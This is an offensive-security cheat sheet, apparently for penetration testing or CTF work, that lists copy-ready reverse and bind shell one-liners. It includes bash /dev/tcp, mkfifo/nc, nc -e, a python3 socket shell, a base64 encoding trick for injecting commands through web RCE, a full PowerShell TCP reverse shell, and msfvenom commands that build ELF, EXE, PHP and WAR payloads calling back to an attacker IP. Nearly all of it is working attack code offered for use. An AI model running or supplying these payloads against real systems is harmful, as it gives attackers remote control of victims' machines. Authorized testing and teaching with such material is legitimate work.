Reverse & Bind Shells
One-liner reverse and bind shells for bash, nc, python, php and PowerShell, plus msfvenom payloads and the base64 trick for web injection. Each payload is its own copy block.
Listener
Catch the shell (rlwrap gives line editing):
rlwrap nc -lvnp 4444Linux reverse shells
bash:
bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1mkfifo (when bash redirection is filtered):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/fnc with -e:
nc <YOUR_IP> 4444 -e /bin/bashpython3:
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<YOUR_IP>",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];subprocess.call(["/bin/bash","-i"])'base64 (for web RCE where spaces/quotes break)
Encode the bash payload:
echo -n 'bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1' | base64Run the encoded blob:
echo <BLOB>|base64 -d|bashWindows / PowerShell reverse shell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('<YOUR_IP>',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$sb=([Text.Encoding]::ASCII).GetBytes($r+'PS> ');$s.Write($sb,0,$sb.Length);$s.Flush()}"Bind shell (you connect to the target)
Target listens:
nc -lvnp 4444 -e /bin/bashYou connect:
nc <TARGET> 4444msfvenom payloads
Linux ELF:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f elf -o s.elfWindows EXE:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f exe -o s.exePHP:
msfvenom -p php/reverse_php LHOST=<YOUR_IP> LPORT=4444 -f raw -o s.phpWAR (Tomcat):
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f war -o s.warNot sure what the box has? Generate a few from revshells.com and try in order, then stabilise (see Shell Upgrade & TTY).